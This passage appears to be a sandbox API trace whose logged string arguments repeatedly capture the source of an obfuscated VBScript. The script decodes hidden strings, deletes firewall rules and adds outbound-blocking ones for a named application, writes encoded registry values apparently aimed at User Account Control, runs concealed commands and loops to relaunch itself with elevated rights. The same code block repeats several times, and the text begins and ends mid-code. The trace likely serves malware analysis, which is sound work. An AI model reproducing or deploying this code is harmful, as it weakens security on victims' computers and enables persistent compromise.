bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 27 [0226.303] wcsncmp (_String1="s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 102 [0226.303] wcsncmp (_String1="1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 36 [0226.303] wcsncmp (_String1=") > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 28 [0226.303] wcsncmp (_String1=" > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd 